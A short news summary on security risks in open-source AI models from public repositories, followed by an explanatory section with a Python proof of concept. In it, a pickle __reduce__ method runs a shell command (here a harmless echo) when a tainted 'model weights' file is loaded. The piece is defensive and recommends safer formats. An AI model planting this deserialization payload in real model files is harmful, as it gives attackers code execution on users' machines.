Free AI Programs Prone To Security Risks, Researchers Say
Published on March 30, 2023 at 02:10AM
Companies rushing to adopt hot new types of artificial intelligence should exercise caution when using open-source versions of the technology, some of which may not work as advertised or may include flaws that hackers can exploit, security researchers say. From a report: There are few ways to know in advance whether a particular AI model -- a program made up of algorithms that can do such things as generate text, images, and predictions -- is safe, said Hyrum Anderson, distinguished engineer at Robust Intelligence, a machine-learning security company that lists the US Defense Department as a client. Anderson said he found that half of the publicly available models for classifying images failed 40% of his tests. The goal was to determine whether a malicious actor could alter the outputs of AI programs in a way that could constitute a security risk or produce incorrect information. Models often use file types that are particularly prone to security flaws, Anderson said. That's a problem because so many companies grab models from publicly available sources rather than building their own, often without fully understanding the underlying technology. Ninety percent of the companies Robust Intelligence works with download models from Hugging Face, a repository of AI models, he said.
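The report doesn't name the vulnerable file types Anderson has in mind, but a frequently cited example in the machine-learning ecosystem is Python's pickle serialization format, long used to distribute model weights. Below is a minimal sketch, assuming the pickle case, of why loading an untrusted model file in that format amounts to running the file author's code; the MaliciousPayload class and the echoed message are purely illustrative.

```python
import os
import pickle

# Minimal illustration of the risk: unpickling executes code chosen by
# whoever created the file. (Never load untrusted pickle files.)
class MaliciousPayload:
    def __reduce__(self):
        # __reduce__ tells pickle how to reconstruct this object on load;
        # a hostile file can use it to run an arbitrary shell command.
        return (os.system, ("echo 'arbitrary code ran during model load'",))

# An attacker ships this blob as "model weights"...
tainted_bytes = pickle.dumps(MaliciousPayload())

# ...and the command runs the moment a victim loads them.
pickle.loads(tainted_bytes)
```

This is documented pickle behavior rather than a bug, which is one reason repositories such as Hugging Face scan uploaded pickle files, and why weight-only formats like safetensors, which store raw tensor data with no executable code path, are commonly recommended for sharing models.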
Read more of this story at Slashdot.